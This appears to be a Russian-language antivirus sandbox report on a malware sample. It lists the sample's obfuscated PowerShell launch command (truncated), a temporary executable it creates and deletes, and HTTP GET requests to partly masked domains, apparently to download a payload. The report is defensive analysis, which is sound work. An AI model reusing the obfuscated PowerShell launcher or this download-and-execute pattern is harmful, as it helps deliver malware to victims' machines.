Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $veRboSEprEFereNCe.tOsTRinG()[1,3]+'x'-jOIn'')( [stRIng]::JOin( '' , ( '37M98s66U99P109k96s33M60_33t111e100e118M44_110k99U107s100s98e117_33s115e96_111M101_110k108t58k37_87>71U116U70M96M33t60...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\119414.exe
Удаляет следующие файлы
- %TEMP%\119414.exe
Сетевая активность
Подключается к
- 'ci##nka.nl':80
- 'ch#####biss-buettgen.de':80
- 'ch#####eworleans.org':80
TCP
Запросы HTTP GET
- http://ci##nka.nl/jfOePxbR/
- http://www.ci##nka.nl/jfOePxbR/
- http://ch#####biss-buettgen.de/my1fugwV/
- http://ch#####eworleans.org/f0N8nSp/
UDP
- DNS ASK ci##nka.nl
- DNS ASK ch#####biss-buettgen.de
- DNS ASK ma####gegardens.in
- DNS ASK ta####obilya.com
- DNS ASK ch#####eworleans.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $veRboSEprEFereNCe.tOsTRinG()[1,3]+'x'-jOIn'')( [stRIng]::JOin( '' , ( '37M98s66U99P109k96s33M60_33t111e100e118M44_110k99U107s100s98e117_33s115e96_111M101_110k108t58k37_87>71U116U70M96M33t60...' (со скрытым окном)
